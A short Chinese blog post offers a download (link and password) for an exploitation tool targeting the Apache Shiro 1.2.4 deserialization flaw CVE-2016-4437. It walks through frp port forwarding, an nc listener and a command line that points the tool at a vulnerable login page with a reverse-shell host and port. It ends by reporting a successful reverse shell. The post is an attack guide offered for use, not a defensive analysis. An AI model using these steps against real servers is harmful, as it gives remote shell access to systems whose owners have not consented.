Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)利用工具

工具 89 字 大概 1 分钟 1,143 次

环境要求

  • windows
  • powershell
  • nc
  • ysoserial.jar

复现过程

配置frp内网穿透

  1. 因为我没有公网环境,所以转发端口 66661234
  2. 下图就是转发成功的样子

1.png

nc本地监听

nc -l -p 1234

执行利用工具

Usage of CVE-2016-4437:
    -a string
         反弹shell的主机地址
    -p string
         反弹shell的端口
    -u string
         存在漏洞的页面地址

CVE-2016-4437 -u http://xxx.xxx.xxx/login.jsp -a xxx.xx.xxx.xxx -p 1234

2.png

反弹成功

3.png

下载地址

抗揍云-戳这下载
密码:ia378a

文章目录
END

本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可。

仅有 1 条感想

  1. 支持 游客 回复
    2021-03-20 15:56

    支持